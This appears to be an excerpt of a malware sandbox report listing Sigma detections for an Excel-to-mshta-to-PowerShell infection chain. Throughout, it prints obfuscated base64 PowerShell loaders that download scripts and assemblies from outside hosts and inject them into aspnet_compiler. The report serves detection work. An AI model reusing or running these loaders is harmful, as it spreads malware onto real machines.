[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3Rlb
              Sigma detected: File With Uncommon Extension Created By An Office Application
              Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3392, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 4052, ProcessName: wscript.exe
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3Rlb
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgI
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3392, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3684, ProcessName: mshta.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 4052, ProcessName: wscript.exe
              Sigma detected: AspNetCompiler Execution
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3108, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3568, ProcessName: aspnet_compiler.exe
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", ProcessId: 3940, ProcessName: csc.exe
              Sigma detected: Excel Network Connections
              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.6, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS
              Sigma detected: Suspicious Office Outbound Connections
